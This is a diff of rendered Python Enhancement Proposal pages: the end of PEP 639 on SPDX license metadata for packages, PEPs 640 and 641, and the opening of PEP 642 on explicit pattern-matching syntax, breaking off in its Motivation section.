Build and publishing tools SHOULD +check that the License-Expression field contains a valid SPDX expression, +including the validity of the particular license identifiers +(as defined above). +Tools MAY halt execution and raise an error when an invalid expression is found. +If tools choose to validate the SPDX expression, they also SHOULD +store a case-normalized version of the License-Expression +field using the reference case for each SPDX license identifier and uppercase +for the AND, OR and WITH keywords. +Tools SHOULD report a warning and publishing tools MAY raise an error +if one or more license identifiers +have been marked as deprecated in the SPDX License List.
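A minimal sketch of that normalization step, assuming a small reference-case lookup (the entries shown are an illustrative subset of the SPDX license list):

import re

REFERENCE_CASE = {i.lower(): i for i in ("MIT", "Apache-2.0", "BSD-2-Clause")}
KEYWORDS = {"and": "AND", "or": "OR", "with": "WITH"}

def normalize_expression(expression):
    """Restore reference case for identifiers and uppercase the keywords;
    custom LicenseRef- identifiers pass through unchanged."""
    def fix(match):
        token = match.group(0)
        lowered = token.lower()
        return KEYWORDS.get(lowered) or REFERENCE_CASE.get(lowered, token)
    return re.sub(r"[A-Za-z0-9.\-+]+", fix, expression)

normalize_expression("mit and (apache-2.0 or bsd-2-clause)")
# -> 'MIT AND (Apache-2.0 OR BSD-2-Clause)'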

+

For all newly-uploaded distribution archives +that include a License-Expression field, +the Python Package Index (PyPI) MUST +validate that they contain a valid, case-normalized license expression with +valid identifiers (as defined above) +and MUST reject uploads that do not. +Custom license identifiers which conform to the SPDX specification +are considered valid. +PyPI MAY reject an upload for using a deprecated license identifier, +so long as it was deprecated as of the above-mentioned SPDX License List +version.

+
+
+

Add License-File field

+

License-File is an optional Core Metadata field. +Each instance contains the string +representation of the path of a license-related file. The path is located +within the project source tree, relative to the +project root directory. +It is a multi-use field that may appear zero or +more times and each instance lists the path to one such file. Files specified +under this field could include license text, author/attribution information, +or other legal notices that need to be distributed with the package.

+

As specified by this PEP, its value +is also that file’s path relative to the root license directory +in both installed projects +and the standardized Distribution Package types.

+

If a License-File is listed in a +Source Distribution or +Built Distribution’s Core Metadata:

+
    +
  • That file MUST be included in the distribution archive at the +specified path relative to the root license directory.
  • +
  • That file MUST be installed with the project at that same relative +path.
  • +
  • The specified relative path MUST be consistent between project source trees, +source distributions (sdists), built distributions (Wheels) and +installed projects.
  • +
  • Inside the root license directory, packaging tools MUST reproduce the +directory structure under which the source license files are located +relative to the project root.
  • +
  • Path delimiters MUST be the forward slash character (/), +and parent directory indicators (..) MUST NOT be used.
  • +
  • License file content MUST be UTF-8 encoded text.
  • +
+

Build tools MAY and publishing tools SHOULD produce an informative warning +if a built distribution’s metadata contains no License-File entries, +and publishing tools MAY but build tools MUST NOT raise an error.

+

For all newly-uploaded distribution archives that include one or more License-File fields in their Core Metadata and declare a Metadata-Version of 2.4 or higher, PyPI SHOULD validate that all specified files are present in the distribution archive, and MUST reject uploads that do not validate.

+
+
+

Deprecate License field

+

The legacy unstructured-text License Core Metadata field +is deprecated and replaced by the new License-Expression field. +The fields are mutually exclusive. +Tools which generate Core Metadata MUST NOT create both these fields. +Tools which read Core Metadata, when dealing with both these fields present +at the same time, MUST read the value of License-Expression and MUST +disregard the value of the License field.

+

If only the License field is present, tools MAY issue a warning +informing users it is deprecated and recommending License-Expression +instead.

+

For all newly-uploaded distribution archives that include a +License-Expression field, the Python Package Index (PyPI) MUST +reject any that specify both License and License-Expression fields.

+

The License field may be removed from a new version of the specification +in a future PEP.
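A sketch of the reading rule, using the standard library; the distribution name is hypothetical:

from importlib.metadata import metadata

md = metadata("example-package")  # hypothetical installed distribution
# If both fields are somehow present, License-Expression wins and the
# deprecated License value is disregarded.
license_info = md.get("License-Expression") or md.get("License")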

+
+
+

Deprecate license classifiers

+

Using license classifiers +in the Classifier Core Metadata field +(described in the Core Metadata specification) +is deprecated and replaced by the more precise License-Expression field.

+

If the License-Expression field is present, build tools MAY raise an error +if one or more license classifiers +is included in a Classifier field, and MUST NOT add +such classifiers themselves.

+

Otherwise, if this field contains a license classifier, +tools MAY issue a warning informing users such classifiers +are deprecated, and recommending License-Expression instead. +For compatibility with existing publishing and installation processes, +the presence of license classifiers SHOULD NOT raise an error unless +License-Expression is also provided.

+

New license classifiers MUST NOT be added to PyPI; +users needing them SHOULD use the License-Expression field instead. +License classifiers may be removed from a new version of the specification +in a future PEP.

+
+
+
+

Project source metadata

+

This PEP specifies changes to the project’s source +metadata under a [project] table in the pyproject.toml file.

+
+

Add string value to license key

+

The license key in the [project] table is defined to contain a top-level string value. It is a valid SPDX license expression, as defined in this PEP. Its value maps to the License-Expression field in the Core Metadata.

+

Build tools SHOULD validate and perform case normalization of the expression +as described in the +Add License-Expression field section, +outputting an error or warning as specified.

+

Examples:

+
[project]
license = "MIT"

[project]
license = "MIT AND (Apache-2.0 OR BSD-2-clause)"

[project]
license = "MIT OR GPL-2.0-or-later OR (FSFUL AND BSD-2-Clause)"

[project]
license = "LicenseRef-Proprietary"
+
+
+
+
+

Add license-files key

+

A new license-files key is added to the [project] table for specifying +paths in the project source tree relative to pyproject.toml to file(s) +containing licenses and other legal notices to be distributed with the package. +It corresponds to the License-File fields in the Core Metadata.

+

Its value is an array of strings which MUST contain valid glob patterns, +as specified below:

+
    +
  • Alphanumeric characters, underscores (_), hyphens (-) and dots (.) +MUST be matched verbatim.
  • +
  • Special glob characters: *, ?, ** and character ranges: [] +containing only the verbatim matched characters MUST be supported. +Within [...], the hyphen indicates a locale-agnostic range (e.g. a-z, +order based on Unicode code points). +Hyphens at the start or end are matched literally.
  • +
  • Path delimiters MUST be the forward slash character (/). +Patterns are relative to the directory containing pyproject.toml, +therefore the leading slash character MUST NOT be used.
  • +
  • Parent directory indicators (..) MUST NOT be used.
  • +
+

Any characters or character sequences not covered by this specification are +invalid. Projects MUST NOT use such values. +Tools consuming this field SHOULD reject invalid values with an error.

+

Tools MUST assume that license file content is valid UTF-8 encoded text, +and SHOULD validate this and raise an error if it is not.

+

Literal paths (e.g. LICENSE) are treated as valid globs, so they may also be listed.

+

Build tools:

+
    +
  • MUST treat each value as a glob pattern, and MUST raise an error if the +pattern contains invalid glob syntax.
  • +
  • MUST include all files matched by a listed pattern in all +distribution archives.
  • +
  • MUST list each matched file path under a License-File field in the +Core Metadata.
  • +
  • MUST raise an error if any individual user-specified pattern +does not match at least one file.
  • +
+

If the license-files key is present and +is set to a value of an empty array, then tools MUST NOT include any +license files and MUST NOT raise an error.

+

Examples of valid license files declaration:

+
[project]
license-files = ["LICEN[CS]E*", "AUTHORS*"]

[project]
license-files = ["licenses/LICENSE.MIT", "licenses/LICENSE.CC0"]

[project]
license-files = ["LICENSE.txt", "licenses/*"]

[project]
license-files = []
+
+
+

Examples of invalid license files declaration:

+
[project]
license-files = ["..\LICENSE.MIT"]
+
+
+

Reason: .. must not be used, and \ is an invalid path delimiter (/ must be used).

+
[project]
license-files = ["LICEN{CSE*"]
+
+
+

Reason: “LICEN{CSE*” is not a valid glob.
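A sketch of how a build tool might apply these rules (error on unmatched patterns, matched paths recorded relative to the project root, and an explicit empty array producing no files); full pattern validation, such as rejecting .. or backslashes, is omitted here:

from pathlib import Path

def collect_license_files(project_root, patterns):
    root = Path(project_root)
    collected = set()
    for pattern in patterns:  # an empty array simply collects nothing
        matches = [p for p in root.glob(pattern) if p.is_file()]
        if not matches:
            raise ValueError(f"license-files pattern matched no files: {pattern!r}")
        for path in matches:
            path.read_bytes().decode("utf-8")  # content must be valid UTF-8
            collected.add(path.relative_to(root).as_posix())
    return sorted(collected)  # one License-File field per entry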

+
+
+

Deprecate license key table subkeys

+

Table values for the license key in the [project] table, +including the text and file table subkeys, are now deprecated. +If the new license-files key is present, +build tools MUST raise an error if the license key is defined +and has a value other than a single top-level string.

+

If the new license-files key is not present +and the text subkey is present in a license table, +tools SHOULD issue a warning informing users it is deprecated +and recommending a license expression as a top-level string key instead.

+

Likewise, if the new license-files key is not present +and the file subkey is present in the license table, +tools SHOULD issue a warning informing users it is deprecated and recommending +the license-files key instead.

+

If the specified license file is present in the source tree, build tools SHOULD use it to fill the License-File field in the Core Metadata, and MUST include the specified file as if it were listed under the license-files key. If the file does not exist at the specified path, tools MUST raise an informative error, as previously specified.

+

Table values for the license key MAY be removed +from a new version of the specification in a future PEP.
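For illustration, a build tool’s handling of the deprecated file subkey might look like the following sketch:

import warnings

def legacy_license_file(project_table):
    """Handle a deprecated ``license = {file = "..."}`` table when the new
    ``license-files`` key is absent."""
    value = project_table.get("license")
    if isinstance(value, dict) and "file" in value:
        warnings.warn("the 'license.file' subkey is deprecated; "
                      "use 'license-files' instead", DeprecationWarning)
        # Treated as if listed under license-files; the tool must still
        # raise an informative error if the file does not exist.
        return [value["file"]]
    return []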

+
+
+
+

License files in project formats

+

A few additions will be made to the existing specifications.

+
+
Project source trees
Per Project source metadata section, the +Declaring Project Metadata specification +will be updated to reflect that license file paths MUST be relative to the +project root directory; i.e. the directory containing the pyproject.toml +(or equivalently, other legacy project configuration, +e.g. setup.py, setup.cfg, etc).
+
Source distributions (sdists)
The sdist specification will be updated to reflect that if the Metadata-Version is 2.4 or greater, the sdist MUST contain any license files specified by the License-File field in the PKG-INFO at their respective paths relative to the root directory of the sdist (the directory containing the pyproject.toml and the PKG-INFO Core Metadata).
+
Built distributions (wheels)
The Wheel specification will be updated to reflect that if +the Metadata-Version is 2.4 or greater and one or more +License-File fields is specified, the .dist-info directory MUST +contain a licenses subdirectory, which MUST contain the files listed +in the License-File fields in the METADATA file at their respective +paths relative to the licenses directory.
+
Installed projects
The Recording Installed Projects specification will be +updated to reflect that if the Metadata-Version is 2.4 or greater +and one or more License-File fields is specified, the .dist-info +directory MUST contain a licenses subdirectory which MUST contain +the files listed in the License-File fields in the METADATA file +at their respective paths relative to the licenses directory, +and that any files in this directory MUST be copied from wheels +by install tools.
+
+
+
+

Converting legacy metadata

+

Tools MUST NOT use the contents of the license.text [project] key +(or equivalent tool-specific format), +license classifiers or the value of the Core Metadata License field +to fill the top-level string value of the license key +or the Core Metadata License-Expression field +without informing the user and requiring unambiguous, affirmative user action +to select and confirm the desired license expression value before proceeding.

+

Tool authors who need to automatically convert license classifiers to +SPDX identifiers can use the +recommendation prepared by +the PEP authors.

+
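As an illustration only, a conversion helper might look like the following. The table here is a hypothetical excerpt, not the recommended mapping itself, and the helper declines to suggest anything for ambiguous classifiers so that the affirmative user confirmation required above still happens.

# Hypothetical excerpt; the authoritative mapping is the one prepared
# by the PEP authors.
CLASSIFIER_TO_SPDX = {
    "License :: OSI Approved :: MIT License": "MIT",
    "License :: OSI Approved :: BSD License": None,  # ambiguous: which BSD?
}

def suggest_license_expression(classifiers):
    ids = [CLASSIFIER_TO_SPDX.get(c)
           for c in classifiers if c.startswith("License ::")]
    if not ids or None in ids:
        return None  # unknown or ambiguous: leave the decision to the user
    return " AND ".join(sorted(set(ids)))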
+
+
+

Backwards Compatibility

+

Adding a new License-Expression Core Metadata field and a top-level string +value for the license key in the pyproject.toml [project] table +unambiguously means support for the specification in this PEP. This avoids the +risk of new tooling misinterpreting a license expression as a free-form license +description or vice versa.

+

The legacy deprecated Core Metadata License field, license key table +subkeys (text and file) in the pyproject.toml [project] table +and license classifiers retain backwards compatibility. A removal is +left to a future PEP and a new version of the Core Metadata specification.

+

Specification of the new License-File Core Metadata field and adding the +files in the distribution is designed to be largely backwards-compatible with +the existing use of that field in many packaging tools. +The new license-files key in the [project] table of +pyproject.toml will only have an effect once users and tools adopt it.

+

This PEP specifies that license files should be placed in a dedicated +licenses subdirectory of the .dist-info directory. This is new and ensures that +wheels following this PEP will have differently-located licenses relative to +those produced via the previous installer-specific behavior. This is further +supported by a new metadata version.

+

This also resolves current issues where license files with the same name in +different places accidentally replace one another, which can silently make +wheels undistributable. It also prevents conflicts with other +metadata files in the same directory.

+

The additions will be made to the source distribution (sdist), built +distribution (wheel) and installed project specifications. They document +behaviors allowed under their current specifications, and gate them behind the +new metadata version.

+

This PEP proposes PyPI implement validation of the new +License-Expression and License-File fields, which has no effect on +new and existing packages uploaded unless they explicitly opt in to using +these new fields and fail to follow the specification correctly. +Therefore, this does not have a backward compatibility impact, and guarantees +forward compatibility by ensuring all distributions uploaded to PyPI with the +new fields conform to the specification.

+
+
+

Security Implications

+

This PEP has no foreseen security implications: the License-Expression +field is a plain string and the License-File fields are file paths. +Neither introduces any known new security concerns.

+
+
+

How to Teach This

+

A majority of packages use a single license, which makes the common case +simple: a single license identifier is a valid license expression.

+

Users of packaging tools will learn the valid license expression of their +package through the messages issued by the tools when they detect invalid +ones, or when the deprecated License field or license classifiers are used.

+

If an invalid License-Expression is used, the users will not be able +to publish their package to PyPI and an error message will help them +understand they need to use SPDX identifiers. +It will be possible to generate a distribution with incorrect license metadata, +but not to publish one on PyPI or any other index server that enforces +License-Expression validity. +For authors using the now-deprecated License field or license classifiers, +packaging tools may warn them and inform them of the replacement, +License-Expression.

+

Tools may also help with the conversion and suggest a license expression in +many common cases.

+ +
+
+

Reference Implementation

+

Tools will need to support parsing and validating license expressions in the +License-Expression field if they decide to implement this part of the +specification. +It’s up to the tools whether they prefer to implement the validation on their +side (e.g. hatch) or use one of the available +Python libraries (e.g. license-expression). +This PEP does not mandate using any specific library and leaves it to the +tool authors to choose the best implementation for their projects.

+
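For example, a tool choosing the license-expression library might validate an expression roughly as follows (a sketch assuming that library’s documented API, not a normative requirement):

from license_expression import get_spdx_licensing

licensing = get_spdx_licensing()
# Raises an ExpressionError for unknown or malformed identifiers.
parsed = licensing.parse("MIT OR (Apache-2.0 AND BSD-3-Clause)", validate=True)
print(parsed)  # the normalized expression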
+
+

Rejected Ideas

+

Many alternative ideas were proposed and, after careful consideration, +rejected. The exhaustive list, including the rationale for rejection, can be +found on a separate page.

+
+
+

Appendices

+

A list of auxiliary documents is provided on separate pages.

+ +
+
+

Acknowledgments

+
    +
  • Alyssa Coghlan
  • +
  • Kevin P. Fleming
  • +
  • Pradyun Gedam
  • +
  • Oleg Grenrus
  • +
  • Dustin Ingram
  • +
  • Chris Jerdonek
  • +
  • Cyril Roelandt
  • +
  • Luis Villa
  • +
  • Seth M. Larson
  • +
  • Ofek Lev
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0639.rst

+

Last modified: 2024-08-29 18:30:14 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0640/index.html b/pep-0640/index.html new file mode 100644 index 00000000000..f4ab03d2273 --- /dev/null +++ b/pep-0640/index.html @@ -0,0 +1,327 @@ PEP 640 – Unused variable syntax | peps.python.org
+
+


+ + +
+
+
+

PEP 640 – Unused variable syntax

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Oct-2020
+
Python-Version:
+
3.10
+
Post-History:
+
19-Oct-2020
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Rejection Note

+

Rejected by the Steering Council: +https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/

+
+
+

Abstract

+

This PEP proposes new syntax for unused variables, providing a pseudo-name +that can be assigned to but not otherwise used. The assignment doesn’t +actually happen, and the value is discarded instead.

+
+
+

Motivation

+

In Python it is somewhat common to need to do an assignment without actually +needing the result. Conventionally, people use either "_" or a name such +as "unused" (or with "unused" as a prefix) for this. It’s most +common in unpacking assignments:

+
x, unused, z = range(3)
+x, *unused, z = range(10)
+
+
+

It’s also used in for loops and comprehensions:

+
for unused in range(10): ...
+[ SpamObject() for unused in range(10) ]
+
+
+

The use of "_" in these cases is probably the most common, but it +potentially conflicts with the use of "_" in internationalization, where +a call like gettext.gettext() is bound to "_" and used to mark strings +for translation.

+
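For reference, this is the internationalization convention that "_" would collide with:

import gettext

_ = gettext.gettext  # the conventional i18n binding of "_"
print(_("Hello, world"))  # marks the string for translation (and translates it)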

In the proposal to add Pattern Matching to Python (originally PEP 622, now +split into PEP 634, PEP 635 and PEP 636), "_" has an additional +special meaning. It is a wildcard pattern, used in places where variables +could be assigned to, to indicate anything should be matched but not +assigned to anything. The choice of "_" there matches the use of "_" +in other languages, but the semantic difference with "_" elsewhere in +Python is significant.

+

This PEP proposes to allow a special token, "?", to be used instead of +any valid name in assignment. This has most of the benefits of "_" +without affecting other uses of that otherwise regular variable. Allowing +the use of the same wildcard pattern would make pattern matching and +unpacking assignment more consistent with each other.

+
+
+

Rationale

+

Marking certain variables as unused is a useful tool, as it helps clarity of +purpose of the code. It makes it obvious to readers of the code as well as +automated linters, that a particular variable is intentionally unused.

+

However, despite the convention, "_" is not a special variable. The +value is still assigned to, the object it refers to is still kept alive +until the end of the scope, and it can still be used. Nor is the use of +"_" for unused variables entirely ubiquitous, since it conflicts with +conventional internationalization, it isn’t obvious that it is a regular +variable, and it isn’t as obviously unused as a variable named +"unused".

+

In the Pattern Matching proposal, the use of "_" for wildcard patterns +side-steps the problems of "_" for unused variables by virtue of it +being in a separate scope. The only conflict it has with +internationalization is one of potential confusion; it will not actually +interact with uses of a global variable called "_". However, the +special-casing of "_" for this wildcard pattern purpose is still +problematic: the different semantics and meaning of "_" inside pattern +matching and outside of it means a break in consistency in Python.

+

Introducing "?" as special syntax for unused variables both inside and +outside pattern matching allows us to retain that consistency. It avoids +the conflict with internationalization or any other uses of _ as a +variable. It makes unpacking assignment align more closely with pattern +matching, making it easier to explain pattern matching as an extension of +unpacking assignment.

+

In terms of code readability, using a special token makes it easier to find +out what it means ("what does question mark in Python do" versus "why +is my _ variable not getting assigned to"), and makes it more obvious that +the actual intent is for the value to be unused – since it is entirely +impossible to use it.

+
+
+

Specification

+

A new token is introduced, "?", or token.QMARK.

+

The grammar is modified to allow "?" in assignment contexts +(star_atom and t_atom in the current grammar), creating a Name +AST node with identifier set to NULL.

+

The AST is modified to allow the Name expression’s identifier to be +optional (it is currently required). The identifier being empty would only +be allowed in a STORE context.

+

In CPython, the bytecode compiler is modified to emit POP_TOP instead of +STORE_NAME for Name nodes with no identifier. Other uses of the +Name node are updated to handle the identifier being empty, as +appropriate.

+
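For comparison, current CPython emits a real store for the throwaway name; under this proposal, a "?" in the same position would compile to POP_TOP instead of the STORE_NAME shown here:

import dis

dis.dis(compile("x, unused, z = range(3)", "<demo>", "exec"))
# ... UNPACK_SEQUENCE 3, then STORE_NAME for each of x, unused and z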

The uses of the modified grammar nodes encompass at least the following +forms of assignment:

+
? = ...
+x, ?, z = ...
+x, *?, z = ...
+for ? in range(3): ...  # including comprehension forms
+for x, ?, z in matrix: ...  # including comprehension forms
+with open(f) as ?: ...
+with func() as (x, ?, z): ...
+
+
+

The use of a single "?", not in an unpacking context, is allowed in +normal assignment and the with statement. It doesn’t really make sense +on its own, and it is possible to disallow those specific cases. However, +for ? in range(3) clearly has its uses, so for consistency reasons if +nothing else it seems more sensible to allow the use of the single "?" +in other cases.

+

Using "?" in augmented assignment (? *= 2) is not allowed, since +"?" can only be used for assignment. Having multiple occurrences of +"?" is valid, just like when assigning to names, and the assignments do +not interfere with each other.

+
+
+

Backwards Compatibility

+

Introducing a new token means there are no backward compatibility concerns. +No valid syntax changes meaning.

+

"?" is not considered an identifier, so str.isidentifier() does not +change.

+
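This is observable today:

print("?".isidentifier())  # False, both before and after this proposal
print("_".isidentifier())  # True: "_" is an ordinary identifier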

The AST does change in an incompatible way, as the identifier of a Name +token can now be empty. Code using the AST will have to be adjusted +accordingly.

+
+
+

How to Teach This

+

"?" can be introduced along with unpacking assignment, explaining it is +special syntax for ‘unused’ and mentioning that it can also be used in other +places. Alternatively, it could be introduced as part of an explanation on +assignment in for loops, showing an example where the loop variable is +unused.

+

PEP 636 discusses how to teach "_", and can simply replace "_" with +"?", perhaps noting that "?" is similarly usable in other contexts.

+
+
+

Reference Implementation

+

A prototype implementation exists at +<https://github.com/Yhg1s/cpython/tree/nonassign>.

+
+
+

Rejected Ideas

+
+
+

Open Issues

+

Should "?" be allowed in the following contexts:

+
# imports done for side-effect only.
+import os as ?
+from os import path as ?
+
+# Function defined for side-effects only (e.g. decorators)
+@register_my_func
+def ?(...): ...
+
+# Class defined for side-effects only (e.g. decorators, __init_subclass__)
+class ?(...): ...
+
+# Parameters defined for unused positional-only arguments:
+def f(a, ?, ?): ...
+lambda a, ?, ?: ...
+
+# Unused variables with type annotations:
+?: int = f()
+
+# Exception handling:
+try: ...
+except Exception as ?: ...
+
+# With blocks:
+with open(f) as ?: ...
+
+
+

Some of these may seem to make sense from a consistency point of view, but +practical uses are limited and dubious. Type annotations on "?" and +using it with except and with do not seem to make any sense. In the +reference implementation, except is not supported (the existing syntax +only allows a name) but with is (by virtue of the existing syntax +supporting unpacking assignment).

+

Should this PEP be accepted even if pattern matching is rejected?

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0640.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0641/index.html b/pep-0641/index.html new file mode 100644 index 00000000000..ef01f4d1e03 --- /dev/null +++ b/pep-0641/index.html @@ -0,0 +1,305 @@ PEP 641 – Using an underscore in the version portion of Python 3.10 compatibility tags | peps.python.org
+
+


+ + +
+
+
+

PEP 641 – Using an underscore in the version portion of Python 3.10 compatibility tags

+
+
Author:
+
Brett Cannon <brett at python.org>, +Steve Dower <steve.dower at python.org>, +Barry Warsaw <barry at python.org>
+
PEP-Delegate:
+
Pablo Galindo <pablogsal at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Oct-2020
+
Python-Version:
+
3.10
+
Post-History:
+
21-Oct-2020
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+
+

Note

+

This PEP was rejected due to potential breakage in the community.

+
+

Using the tag system outlined in PEP 425 (primarily used for wheel +file names), each release of Python specifies compatibility tags +(e.g. cp39, py39 for CPython 3.9). For CPython 3.10, this PEP +proposes using 3_10 as the version portion of the tags +(instead of 310).

+
+
+

Motivation

+

Up to this point, the version portion of compatibility tags used in +e.g. wheel file names has been a straight concatenation of the major +and minor versions of Python, both for the CPython interpreter tag and +the generic, interpreter-agnostic interpreter tag (e.g. cp39 and +py39, respectively). This also applies to the ABI tag +(e.g. cp39). Thanks to both the major and minor versions being +single digits, it has been unambiguous which digit in e.g. 39 +represented what.

+

But starting with Python 3.10, ambiguity comes up as 310 does not +clearly delineate whether the Python version is 3.10, 31.0, or +310 as the major-only version of Python. Thus using 3_10 to +separate major/minor portions as allowed by PEP 425 disambiguates +the Python version being supported.

+
+
+

Rationale

+

Using an underscore as the separator (rather than some other proposed +character) is a restriction imposed by PEP 425; thus the only options are +3_10 or 310.

+
+
+

Specification

+

The SOABI configure variable and +sysconfig.get_config_var('py_version_nodot') will be updated to +use 3_10 appropriately.

+
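For reference, a current CPython still reports the concatenated form, since this PEP was rejected:

import sysconfig

print(sysconfig.get_config_var("py_version_nodot"))  # e.g. '310' on CPython 3.10
# Under this (rejected) proposal it would have been '3_10'.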
+
+

Backwards Compatibility

+

Tools relying on the ‘packaging’ project [2] already expect a +version specification of 3_10 for Python 3.10. Keeping the version +specifier as 310 would require backing that change out and +updating dependent projects (e.g. pip).

+

Switching to 3_10 will impact any tools that implicitly rely on +the convention that the minor version is a single digit. However, +these are broken regardless of any change here.

+

For tools assuming the major version is only the first digit, they +will require updating if we switch to 3_10.

+

In non-locale ASCII, _ sorts after any digit, so lexicographic +sorting of wheel file names will continue to match sorting by Python +version.

+

Since PEP 515 (Python 3.6), underscores in numeric literals are ignored. +This means that int("3_10") and int("310") produce the same result, +and ordering based on conversion to an integer will be preserved. +However, this is still a bad way to sort tags, and the point is raised +here simply to show that this proposal does not make things worse.

+
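A quick demonstration of that equivalence:

print(int("3_10") == int("310") == 310)  # True, thanks to PEP 515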
+
+

Security Implications

+

There are no known security concerns.

+
+
+

How to Teach This

+

As use of the interpreter tag is mostly machine-based and this PEP +disambiguates, there should not be any special teaching consideration +required.

+
+
+

Reference Implementation

+

A pull request [1] already exists adding support to CPython 3.10. +Support for reading wheel files with this proposed PEP is already +implemented.

+
+
+

Rejected Ideas

+
+

Not making the change

+

It was considered to not change the tag and stay with 310. The +argument was that it is less work and will not break any existing +tooling. But in the end the disambiguation was judged worth having.

+
+
+
+

Open Issues

+
+

How far should we take this?

+

Other places where the major and minor version are used could be +updated to use an underscore as well (e.g. .pyc files, the import +path to the zip file for the stdlib). It is not known how useful it +would be to make this pervasive.

+
+
+

Standardizing on double digit minor version numbers

+

An alternative suggestion has been made to disambiguate where the +major and minor versions start/stop by forcing the minor version to +always be two digits, padding with a 0 as required. The advantage +of this is that it makes the current cp310 interpreter tag accurate, +thus minimizing breakage. It also disambiguates going forward.

+

There are a couple of drawbacks, though. One is the disambiguation +only exists if you know that the minor version number is two digits; +compare that to cp3_10 which is unambiguous regardless of your +base knowledge. The potential for a three digit minor version number +is also not addressed by this two digit requirement.

+

There is also the issue of other interpreters not following the +practice in the past, present, or future. For instance, it is +unknown whether a three digit version portion of the interpreter tag has +previously been used for another interpreter, where this rule +would be incorrect. This change would also require interpreters which +currently have a single digit minor version (e.g. PyPy 7.3) to +change from pp73 to pp703 or make the switch from their next +minor release onward (e.g. 7.4 or 8.0). Otherwise this rule would be +exclusive to the cp interpreter type, which would make it more +confusing for people.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0641.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0642/index.html b/pep-0642/index.html new file mode 100644 index 00000000000..70059ddf420 --- /dev/null +++ b/pep-0642/index.html @@ -0,0 +1,2107 @@ PEP 642 – Explicit Pattern Syntax for Structural Pattern Matching | peps.python.org
+
+


+ + +
+
+
+

PEP 642 – Explicit Pattern Syntax for Structural Pattern Matching

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
634
+
Created:
+
26-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
31-Oct-2020, 08-Nov-2020, 03-Jan-2021
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

This PEP covers an alternative syntax proposal for PEP 634’s structural pattern +matching that requires explicit prefixes on all capture patterns and value +constraints. It also proposes a new dedicated syntax for instance attribute +patterns that aligns more closely with the proposed mapping pattern syntax.

+

While the result is necessarily more verbose than the proposed syntax in +PEP 634, it is still significantly less verbose than the status quo.

+

As an example, the following match statement would extract “host” and “port” +details from a 2 item sequence, a mapping with “host” and “port” keys, any +object with “host” and “port” attributes, or a “host:port” string, treating +the “port” as optional in the latter three cases:

+
port = DEFAULT_PORT
+match expr:
+    case [as host, as port]:
+        pass
+    case {"host" as host, "port" as port}:
+        pass
+    case {"host" as host}:
+        pass
+    case object{.host as host, .port as port}:
+        pass
+    case object{.host as host}:
+        pass
+    case str{} as addr:
+        host, __, optional_port = addr.partition(":")
+        if optional_port:
+            port = optional_port
+    case __ as m:
+        raise TypeError(f"Unknown address format: {m!r:.200}")
+port = int(port)
+
+
+

At a high level, this PEP proposes to categorise the different available pattern +types as follows:

+
    +
  • wildcard pattern: __
  • +
  • group patterns: (PTRN)
  • +
  • +
    value constraint patterns:
      +
    • equality constraints: == EXPR
    • +
    • identity constraints: is EXPR
    • +
    +
    +
    +
  • +
  • +
    structural constraint patterns:
      +
    • sequence constraint patterns: [PTRN, as NAME, PTRN as NAME]
    • +
    • mapping constraint patterns: {EXPR: PTRN, EXPR as NAME}
    • +
    • instance attribute constraint patterns: +CLS{.NAME, .NAME: PTRN, .NAME == EXPR, .NAME as NAME}
    • +
    • class defined constraint patterns: +CLS(PTRN, PTRN, **{.NAME, .NAME: PTRN, .NAME == EXPR, .NAME as NAME})
    • +
    +
    +
    +
  • +
  • OR patterns: PTRN | PTRN | PTRN
  • +
  • AS patterns: PTRN as NAME (omitting the pattern implies __)
  • +
+

The intent of this approach is to:

+
    +
  • allow an initial form of pattern matching to be developed and released without +needing to decide up front on the best default options for handling bare names, +attribute lookups, and literal values
  • +
  • ensure that pattern matching is defined explicitly at the Abstract Syntax Tree +level, allowing the specifications of the semantics and the surface syntax for +pattern matching to be clearly separated
  • +
  • define a clear and concise “ducktyping” syntax that could potentially be +adopted in ordinary expressions as a way to more easily retrieve a tuple +containing multiple attributes from the same object
  • +
+

Relative to PEP 634, the proposal also deliberately eliminates any syntax that +“binds to the right” without using the as keyword (using capture patterns +in PEP 634’s mapping patterns and class patterns) or binds to both the left and +the right in the same pattern (using PEP 634’s capture patterns with AS patterns)

+
+
+

Relationship with other PEPs

+

This PEP both depends on and competes with PEP 634 - the PEP author agrees that +match statements would be a sufficiently valuable addition to the language to +be worth the additional complexity that they add to the learning process, but +disagrees with the idea that “simple name vs literal or attribute lookup” +really offers an adequate syntactic distinction between name binding and value +lookup operations in match patterns (at least for Python).

+

This PEP agrees with the spirit of PEP 640 (that the chosen wildcard pattern to +skip a name binding should be supported everywhere, not just in match patterns), +but is now proposing a different spelling for the wildcard syntax (__ rather +than ?). As such, it competes with PEP 640 as written, but would complement +a proposal to deprecate the use of __ as an ordinary identifier and instead +turn it into a general purpose wildcard marker that always skips making a new +local variable binding.

+

While it has not yet been put forward as a PEP, Mark Shannon has a pre-PEP draft +[8] expressing several concerns about the runtime semantics of the pattern +matching proposal in PEP 634. This PEP is somewhat complementary to that one, as +even though this PEP is mostly about surface syntax changes rather than major +semantic changes, it does propose that the Abstract Syntax Tree definition be +made more explicit to better separate the details of the surface syntax from the +semantics of the code generation step. There is one specific idea in that pre-PEP +draft that this PEP explicitly rejects: the idea that the different kinds of +matching are mutually exclusive. It’s entirely possible for the same value to +match different kinds of structural pattern, and which one takes precedence will +intentionally be governed by the order of the cases in the match statement.

+
+
+

Motivation

+

